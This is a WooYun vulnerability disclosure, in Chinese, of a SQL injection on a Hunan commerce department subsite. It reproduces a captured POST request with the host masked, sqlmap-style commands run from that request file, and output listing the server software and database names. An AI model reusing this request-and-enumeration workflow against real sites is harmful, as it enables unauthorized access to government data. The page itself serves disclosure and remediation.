当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0170011

漏洞标题:湖南省商务厅某分站sql注入漏洞导致信息泄漏

相关厂商:cncert国家互联网应急中心

漏洞作者: IceKing

提交时间:2016-01-17 18:52

修复时间:2016-03-04 13:27

公开时间:2016-03-04 13:27

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-17: 细节已通知厂商并且等待厂商处理中
2016-01-20: 厂商已经确认,细节仅向厂商公开
2016-01-30: 细节向核心白帽子及相关领域专家公开
2016-02-09: 细节向普通白帽子公开
2016-02-19: 细节向实习白帽子公开
2016-03-04: 细节向公众公开

简要描述:

RT

详细说明:

POST /Modules/XingZhengXuKe/XuKeShenQing_FanKui.aspx?JiGouBianHao=430000&ZT=sfdfsfsf HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/Modules/XingZhengXuKe/XuKeShenQing_FanKui.aspx?JiGouBianHao=430000&ZT=sfdfsfsf
Cookie: ASP.NET_SessionId=2qljzm55bdd2jc45plnzwb45
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 9858
__VIEWSTATE=%2FwEPDwUKMTcxNTg2OTU3Nw9kFgICAw9kFhJmD2QWBAIBDw8WAh4EVGV4dAUKLea5luWNl%2BecgWRkAgMPFgIeCWlubmVyaHRtbAX6DjxhIGhyZWY9Imh0dHA6Ly96d2drLmh1bmFuY29tLmdvdi5jbi8vaW5kZXguYXNweD9KaUdvdUJpYW5IYW89NDMwMTAwIiB0YXJnZXQ9Il9ibGFuayIgIGNsYXNzPSJ3ejMiPumVv%2BaymeW4gjwvYT4mbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7PGEgaHJlZj0iaHR0cDovL3p3Z2suaHVuYW5jb20uZ292LmNuLy9pbmRleC5hc3B4P0ppR291Qmlhbkhhbz00MzA0MDAiIHRhcmdldD0iX2JsYW5rIiAgY2xhc3M9Ind6MyI%2B5rmY5r2t5biCPC9hPiZuYnNwOyZuYnNwO3wmbmJzcDsmbmJzcDs8YSBocmVmPSJodHRwOi8vendnay5odW5hbmNvbS5nb3YuY24vL2luZGV4LmFzcHg%2FSmlHb3VCaWFuSGFvPTQzMDUwMCIgdGFyZ2V0PSJfYmxhbmsiICBjbGFzcz0id3ozIj7ooaHpmLPluII8L2E%2BJm5ic3A7Jm5ic3A7fCZuYnNwOyZuYnNwOzxhIGhyZWY9Imh0dHA6Ly96d2drLmh1bmFuY29tLmdvdi5jbi8vaW5kZXguYXNweD9KaUdvdUJpYW5IYW89NDMwNzAwIiB0YXJnZXQ9Il9ibGFuayIgIGNsYXNzPSJ3ejMiPuWys%2BmYs%2BW4gjwvYT4mbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7PGEgaHJlZj0iaHR0cDovL3p3Z2suaHVuYW5jb20uZ292LmNuLy9pbmRleC5hc3B4P0ppR291Qmlhbkhhbz00MzA4MDAiIHRhcmdldD0iX2JsYW5rIiAgY2xhc3M9Ind6MyI%2B5bi45b635biCPC9hPiZuYnNwOyZuYnNwO3wmbmJzcDsmbmJzcDs8YSBocmVmPSJodHRwOi8vendnay5odW5hbmNvbS5nb3YuY24vL2luZGV4LmFzcHg%2FSmlHb3VCaWFuSGFvPTQzMDkwMCIgdGFyZ2V0PSJfYmxhbmsiICBjbGFzcz0id3ozIj7lvKDlrrbnlYzluII8L2E%2BJm5ic3A7Jm5ic3A7fCZuYnNwOyZuYnNwOzxhIGhyZWY9Imh0dHA6Ly96d2drLmh1bmFuY29tLmdvdi5jbi8vaW5kZXguYXNweD9KaUdvdUJpYW5IYW89NDMxMDAwIiB0YXJnZXQ9Il9ibGFuayIgIGNsYXNzPSJ3ejMiPuebiumYs%2BW4gjwvYT4mbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7PGEgaHJlZj0iaHR0cDovL3p3Z2suaHVuYW5jb20uZ292LmNuLy9pbmRleC5hc3B4P0ppR291Qmlhbkhhbz00MzE0MDAiIHRhcmdldD0iX2JsYW5rIiAgY2xhc3M9Ind6MyI%2B5rC45bee5biCPC9hPiZuYnNwOyZuYnNwO3wmbmJzcDsmbmJzcDs8YSBocmVmPSJodHRwOi8vendnay5odW5hbmNvbS5nb3YuY24vL2luZGV4LmFzcHg%2FSmlHb3VCaWFuSGFvPTQzMTIwMCIgdGFyZ2V0PSJfYmxhbmsiICBjbGFzcz0id3ozIj7pg7Tlt57luII8L2E%2BJm5ic3A7Jm5ic3A7fCZuYnNwOyZuYnNwOzxhIGhyZWY9Imh0dHA6Ly96d2drLmh1bmFuY29tLmdvdi5jbi8vaW5kZXguYXNweD9KaUdvdUJpYW5IYW89NDMxNTAwIiB0YXJnZXQ9Il9ibGFuayIgIGNsYXNzPSJ3ejMiPuaAgOWMluW4gjwvYT4mbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7PGEgaHJlZj0iaHR0cDovL3p3Z2suaHVuYW5jb20uZ292LmNuLy9pbmRleC5hc3B4P0ppR291Qmlhbkhhbz00MzE2MDAiIHRhcmdldD0iX2JsYW5rIiAgY2xhc3M9Ind6MyI%2B5aiE5bqV5biCPC9hPiZuYnNwOyZuYnNwO3wmbmJzcDsmbmJzcDs8YSBocmVmPSJodHRwOi8vendnay5odW5hbmNvbS5nb3YuY24vL2luZGV4LmFzcHg%2FSmlHb3VCaWFuSGFvPTQzMTcwMCIgdGFyZ2V0PSJfYmxhbmsiICBjbGFzcz0id3ozIj7muZjopb%2Foh6rmsrvlt548L2E%2BJm5ic3A7Jm5ic3A7fCZuYnNwOyZuYnNwOzxhIGhyZWY9Imh0dHA6Ly96d2drLmh1bmFuY29tLmdvdi5jbi8vaW5kZXguYXNweD9KaUdvdUJpYW5IYW89NDMwMzAwIiB0YXJnZXQ9Il9ibGFuayIgIGNsYXNzPSJ3ejMiPuagqua0suW4gjwvYT4mbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7PGEgaHJlZj0iaHR0cDovL3p3Z2suaHVuYW5jb20uZ292LmNuLy9pbmRleC5hc3B4P0ppR291Qmlhbkhhbz00MzA2MDAiIHRhcmdldD0iX2JsYW5rIiAgY2xhc3M9Ind6MyI%2B6YK16Ziz5biCPC9hPiZuYnNwOyZuYnNwO2QCAg9kFgICAw9kFgICAQ9kFgJmD2QWAgICDw9kFgIeB29uY2xpY2sFKHJldHVybiBjb25maXJtKCfmmK%2FlkKbnnJ%2FnmoTms6jplIDvvJ8nKTtkAgUPDxYCHwBlZGQCCA8WAh4Hb25mb2N1cwUOY2FsZW5kYXIodGhpcylkAgkPFgIfAwUOY2FsZW5kYXIodGhpcylkAgsPPCsADQIADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50AmZkCRYCHgxQYWdlclZpc2libGVoFgJmD2QWLGYPDxYCHgdWaXNpYmxlaGRkAgEPZBYCZg9kFgoCAQ8PFgIfAAUKMjAxNS0xMC0wOGRkAgMPZBYCZg8VASXlvbzlsJTnvZfms7XkuJrvvIjmuZbljZcp5pyJ6ZmQ5YWs5Y%2B4ZAIFD2QWAmYPFQES57uP6JCl5pyf6ZmQ5Y%2BY5pu0ZAIHD2QWAmYPFQFIPHNwYW4gY2xhc3M9Ind6MyIgc3R5bGUgPSJjb2xvcjogIzgwMTcxNzsiPuacrOmhueebruW3sue7j%2BWPl%2BeQhjwvc3Bhbj4gZAIIDxUBAGQCAg9kFgJmD2QWCgIBDw8WAh8ABQoyMDE1LTEwLTA4ZGQCAw9kFgJmDxUBHua5luWNl%2BWYieWuh%2BWFuOW9k%2BaciemZkOWFrOWPuGQCBQ9kFgJmDxUBDOiCoeadg%2BWPmOabtGQCBw9kFgJmDxUBSDxzcGFuIGNsYXNzPSJ3ejMiIHN0eWxlID0iY29sb3I6ICM4MDE3MTc7Ij7mnKzpobnnm67lt7Lnu4%2Flj5fnkIY8L3NwYW4%2BIGQCCA8VAQBkAgMPZBYCZg9kFgoCAQ8PFgIfAAUKMjAxNS0xMC0wOGRkAgMPZBYCZg8VASTmuZbljZflpJbnu4%2Flu7rorr7lt6XnqIvmnInpmZDlhazlj7hkAgUPZBYCZg8VAR7pgoDor7flpJbllYbmnaXmuZjllYbliqHmtL3osIhkAgcPZBYCZg8VAUg8c3BhbiBjbGFzcz0id3ozIiBzdHlsZSA9ImNvbG9yOiAjODAxNzE3OyI%2B5pys6aG555uu5bey57uP5Y%2BX55CGPC9zcGFuPiBkAggPFQEAZAIED2QWAmYPZBYKAgEPDxYCHwAFCjIwMTUtMTAtMDhkZAIDD2QWAmYPFQEq5rmW5Y2X5b%2Br5LmQ5paH5YyW5Zu96ZmF5ouN5Y2W5pyJ6ZmQ5YWs5Y%2B4ZAIFD2QWAmYPFQE255Sz6K%2B36K6%2B56uL5rmW5Y2X5b%2Br5LmQ5paH5YyW5Zu96ZmF5ouN5Y2W5pyJ6ZmQ5YWs5Y%2B4ZAIHD2QWAmYPFQFIPHNwYW4gY2xhc3M9Ind6MyIgc3R5bGUgPSJjb2xvcjogIzgwMTcxNzsiPuacrOmhueebruW3sue7j%2BWPl%2BeQhjwvc3Bhbj4gZAIIDxUBAGQCBQ9kFgJmD2QWCgIBDw8WAh8ABQoyMDE1LTEwLTA4ZGQCAw9kFgJmDxUBGOa5luWNl%2BecgemBk%2BWOv%2BWVhuWKoeWxgGQCBQ9kFgJmDxUBFemBk%2BWOv%2BS4nOWNh%2BWKoOayueermWQCBw9kFgJmDxUBSDxzcGFuIGNsYXNzPSJ3ejMiIHN0eWxlID0iY29sb3I6ICM4MDE3MTc7Ij7mnKzpobnnm67lt7Lnu4%2Flj5fnkIY8L3NwYW4%2BIGQCCA8VAQBkAgYPZBYCZg9kFgoCAQ8PFgIfAAUKMjAxNS0xMC0wOGRkAgMPZBYCZg8VARjmuZbljZfnnIHpgZPljr%2FllYbliqHlsYBkAgUPZBYCZg8VARXpgZPljr%2Fot4Pov5vliqDmsrnnq5lkAgcPZBYCZg8VAUg8c3BhbiBjbGFzcz0id3ozIiBzdHlsZSA9ImNvbG9yOiAjODAxNzE3OyI%2B5pys6aG555uu5bey57uP5Y%2BX55CGPC9zcGFuPiBkAggPFQEAZAIHD2QWAmYPZBYKAgEPDxYCHwAFCjIwMTUtMDktMzBkZAIDD2QWAmYPFQEq6ICB55m%2B5aeT5aSn6I2v5oi%2F6L%2Be6ZSB6IKh5Lu95pyJ6ZmQ5YWs5Y%2B4ZAIFD2QWAmYPFQG0AeiAgeeZvuWnk%2BWkp%2BiNr%2BaIv%2Bi%2FnumUgeiCoeS7veaciemZkOWFrOWPuOmVv%2BaymeaYn%2BaymemHkeiMgui3r%2BekvuWMuuWIhuW6l%2BOAgemVv%2BaymeacnemYs%2Baso%2BWbreWIhuW6l%2BOAgemVv%2Baymeebm%2BS4luWNjueroOWIhuW6l%2BOAgeahgumYs%2Bm%2Bmea9reilv%2Bi3r%2BWIhuW6l%2BWSjOaWsOWugeWGnOi0uOW4guWcuuW6l2QCBw9kFgJmDxUBSDxzcGFuIGNsYXNzPSJ3ejMiIHN0eWxlID0iY29sb3I6ICM4MDE3MTc7Ij7mnKzpobnnm67lt7Lnu4%2Flj5fnkIY8L3NwYW4%2BIGQCCA8VAQBkAggPZBYCZg9kFgoCAQ8PFgIfAAUKMjAxNS0wOS0zMGRkAgMPZBYCZg8VARjlsrPpmLPluILllYbliqHnsq7po5%2FlsYBkAgUPZBYCZg8VASTlsrPpmLPluILljJfmuK%2FliqDmsrnnq5nlkI3np7Dlj5jmm7RkAgcPZBYCZg8VAUg8c3BhbiBjbGFzcz0id3ozIiBzdHlsZSA9ImNvbG9yOiAjODAxNzE3OyI%2B5pys6aG555uu5bey57uP5Y%2BX55CGPC9zcGFuPiBkAggPFQEAZAIJD2QWAmYPZBYKAgEPDxYCHwAFCjIwMTUtMDktMzBkZAIDD2QWAmYPFQEY5bKz6Ziz5biC5ZWG5Yqh57Ku6aOf5bGAZAIFD2QWAmYPFQE25Lit5rW35rK55rGo572X5biC56Kn5rW35Yqg5rK556uZ5ZCN56ew5Y%2BK5rOV5Lq65Y%2BY5pu0ZAIHD2QWAmYPFQFIPHNwYW4gY2xhc3M9Ind6MyIgc3R5bGUgPSJjb2xvcjogIzgwMTcxNzsiPuacrOmhueebruW3sue7j%2BWPl%2BeQhjwvc3Bhbj4gZAIIDxUBAGQCCg9kFgJmD2QWCgIBDw8WAh8ABQoyMDE1LTA5LTMwZGQCAw9kFgJmDxUBEuWuieWMluWOv%2BWVhuWKoeWxgGQCBQ9kFgJmDxUBJ%2BWuieWMluWOv%2Bi%2FnOmpsOWKoOayueermeWOn%2BWdgOaUueaJqeW7umQCBw9kFgJmDxUBSDxzcGFuIGNsYXNzPSJ3ejMiIHN0eWxlID0iY29sb3I6ICM4MDE3MTc7Ij7mnKzpobnnm67lt7Lnu4%2Flj5fnkIY8L3NwYW4%2BIGQCCA8VAQBkAgsPZBYCZg9kFgoCAQ8PFgIfAAUKMjAxNS0wOS0zMGRkAgMPZBYCZg8VARjlsrPpmLPluILllYbliqHnsq7po5%2FlsYBkAgUPZBYCZg8VATbkuK3mtbfmsrnmsajnvZfluILnoqfmtbfliqDmsrnnq5nlkI3np7Dlj4rms5Xkurrlj5jmm7RkAgcPZBYCZg8VAU48c3BhbiBjbGFzcz0id3ozIiBzdHlsZSA9ImNvbG9yOiAjNzQ0RDk5OyI%2B5pys6aG555uu6ZyA6KaB6KGl5q2j6LWE5paZPC9zcGFuPiBkAggPFQEAZAIMD2QWAmYPZBYKAgEPDxYCHwAFCjIwMTUtMDktMjlkZAIDD2QWAmYPFQES5qGD5rqQ5Y6%2F5ZWG5Yqh5bGAZAIFD2QWAmYPFQEY5qGD5rqQ5Y6%2F57qi54mb5Yqg5rK556uZZAIHD2QWAmYPFQFIPHNwYW4gY2xhc3M9Ind6MyIgc3R5bGUgPSJjb2xvcjogIzgwMTcxNzsiPuacrOmhueebruW3sue7j%2BWPl%2BeQhjwvc3Bhbj4gZAIIDxUBAGQCDQ9kFgJmD2QWCgIBDw8WAh8ABQoyMDE1LTA5LTI5ZGQCAw9kFgJmDxUBEuahg%2Ba6kOWOv%2BWVhuWKoeWxgGQCBQ9kFgJmDxUBGOahg%2Ba6kOWOv%2BWfjuWNl%2BWKoOayueermWQCBw9kFgJmDxUBSDxzcGFuIGNsYXNzPSJ3ejMiIHN0eWxlID0iY29sb3I6ICM4MDE3MTc7Ij7mnKzpobnnm67lt7Lnu4%2Flj5fnkIY8L3NwYW4%2BIGQCCA8VAQBkAg4PZBYCZg9kFgoCAQ8PFgIfAAUKMjAxNS0wOS0yOWRkAgMPZBYCZg8VARLmoYPmupDljr%2FllYbliqHlsYBkAgUPZBYCZg8VASTmoYPmupDljr%2FnkIblhazmuK%2FplYfmgJ3nkbbliqDmsrnnq5lkAgcPZBYCZg8VAUg8c3BhbiBjbGFzcz0id3ozIiBzdHlsZSA9ImNvbG9yOiAjODAxNzE3OyI%2B5pys6aG555uu5bey57uP5Y%2BX55CGPC9zcGFuPiBkAggPFQEAZAIPD2QWAmYPZBYKAgEPDxYCHwAFCjIwMTUtMDktMjlkZAIDD2QWAmYPFQES5qGD5rqQ5Y6%2F5ZWG5Yqh5bGAZAIFD2QWAmYPFQFX5Lit5Zu955%2Bz5rK55aSp54S25rCU6IKh5Lu95pyJ6ZmQ5YWs5Y%2B45rmW5Y2X6ZSA5ZSu5YiG5YWs5Y%2B45qGD5rqQ5Y6%2F6Iy25bq16ZO65Yqg5rK556uZZAIHD2QWAmYPFQFIPHNwYW4gY2xhc3M9Ind6MyIgc3R5bGUgPSJjb2xvcjogIzgwMTcxNzsiPuacrOmhueebruW3sue7j%2BWPl%2BeQhjwvc3Bhbj4gZAIIDxUBAGQCEA9kFgJmD2QWCgIBDw8WAh8ABQoyMDE1LTA5LTI5ZGQCAw9kFgJmDxUBEuagqua0suW4guWVhuWKoeWxgGQCBQ9kFgJmDxUBIeaUuOWOv%2BaZruiBlOaftOayueeCueero%2BW3pemqjOaUtmQCBw9kFgJmDxUBSDxzcGFuIGNsYXNzPSJ3ejMiIHN0eWxlID0iY29sb3I6ICM4MDE3MTc7Ij7mnKzpobnnm67lt7Lnu4%2Flj5fnkIY8L3NwYW4%2BIGQCCA8VAQBkAhEPZBYCZg9kFgoCAQ8PFgIfAAUKMjAxNS0wOS0yOWRkAgMPZBYCZg8VARLooaHlsbHljr%2FllYbliqHlsYBkAgUPZBYCZg8VASTmlrDlu7rooaHlsbHljr%2FmlrDmoaXkuIrnlYzliqDmsrnnq5lkAgcPZBYCZg8VAU48c3BhbiBjbGFzcz0id3ozIiBzdHlsZSA9ImNvbG9yOiAjNzQ0RDk5OyI%2B5pys6aG555uu6ZyA6KaB6KGl5q2j6LWE5paZPC9zcGFuPiBkAggPFQEAZAISD2QWAmYPZBYKAgEPDxYCHwAFCjIwMTUtMDktMjlkZAIDD2QWAmYPFQES6L6w5rqq5Y6%2F5ZWG5Yqh5bGAZAIFD2QWAmYPFQEn6L6w5rqq5Y6%2F5L%2Bu5rqq5Lmh5bCP5qaV5p%2B05rK56Zu25ZSu54K5ZAIHD2QWAmYPFQFOPHNwYW4gY2xhc3M9Ind6MyIgc3R5bGUgPSJjb2xvcjogIzc0NEQ5OTsiPuacrOmhueebrumcgOimgeihpeato%2Bi1hOaWmTwvc3Bhbj4gZAIIDxUBAGQCEw9kFgJmD2QWCgIBDw8WAh8ABQoyMDE1LTA5LTI5ZGQCAw9kFgJmDxUBG%2BebiumYs%2BW4guWVhuWKoeWxgOiwg%2BiKguenkWQCBQ9kFgJmDxUBXeWuieWMluWOv%2BmprOi3r%2BS4nOermeWKoOayueermeeUs%2Bivt%2Bi%2FgeW7uuero%2BW3pemqjOaUtuOAgeWPmOabtOS8geS4muWQjeensOWSjOazleWumuS7o%2BihqOS6umQCBw9kFgJmDxUBTjxzcGFuIGNsYXNzPSJ3ejMiIHN0eWxlID0iY29sb3I6ICM3NDREOTk7Ij7mnKzpobnnm67pnIDopoHooaXmraPotYTmlpk8L3NwYW4%2BIGQCCA8VAQBkAhQPZBYCZg9kFgoCAQ8PFgIfAAUKMjAxNS0wOS0yOWRkAgMPZBYCZg8VARvmuZbljZfnnIHmgIDljJbluILllYbliqHlsYBkAgUPZBYCZg8VASLmlrAg5bu65rSq5rGf5Yy65qGD5p2O5Zut5Yqg5rK556uZZAIHD2QWAmYPFQFOPHNwYW4gY2xhc3M9Ind6MyIgc3R5bGUgPSJjb2xvcjogIzc0NEQ5OTsiPuacrOmhueebrumcgOimgeihpeato%2Bi1hOaWmTwvc3Bhbj4gZAIIDxUBAGQCFQ8PFgIfB2hkZAIMDw8WAh8ABQMxMDJkZAIODw8WAh8ABQExZGQCDw8PFgIfAAUBNmRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYGBRxMb2dpblRyQ29udHJvbDEkSW1hZ2VCdXR0b24xBQxJbWFnZUJ1dHRvbjEFCGJ0bkZpcnN0BQdidG5QcmV2BQdidG5OZXh0BQdidG5MYXN0BQ9EaXNwbGF5RGF0YUdyaWQPPCsACgEIAgZkbS0yTIWlc0CbCKu%2BDMFK3pDW%2BKk%3D&__EVENTVALIDATION=%2FwEWEQKagqQgAqKx3MoGAvfU%2FNYHAo33%2F7kPAvvUk14Cx6371QkC7NGy6wYC46yBogwC6MKiYwLs0fbZDAKFtav5DwKFtcf5DwLSwpnTCAKO%2BN3hDwLWs7u7BwK14fOOCgKx4bePCewWj1JquNpfBHL5izQLXS1iyrDN&LoginTrControl1%24Text_Account=&LoginTrControl1%24Text_PW=&LoginTrControl1%24PassCode=&p_keyword=%25&TextBox1=&Text_list=&Hidden1=&TextBox2=&ZheCeShiJian_C=&ZheCeShiJian_D=&ImageButton1.x=50&ImageButton1.y=17
-r e:\k.txt
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
-r e:\k.txt --dbs
available databases [11]:
[*] FileManage
[*] GoldSoftPA
[*] GoldSoftPAtest
[*] master
[*] model
[*] msdb
[*] OA
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] XZZF
-r e:\k.txt --tables


1.png


2.png


3.png


4.png

漏洞证明:

4.png

修复方案:

修复

版权声明:转载请注明来源 IceKing@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-01-20 15:09

厂商回复:

CNVD确认未复现所述情况,已经转由CNCERT下发给湖南分中心,由其后续协调网站管理单位处置.

最新状态:

暂无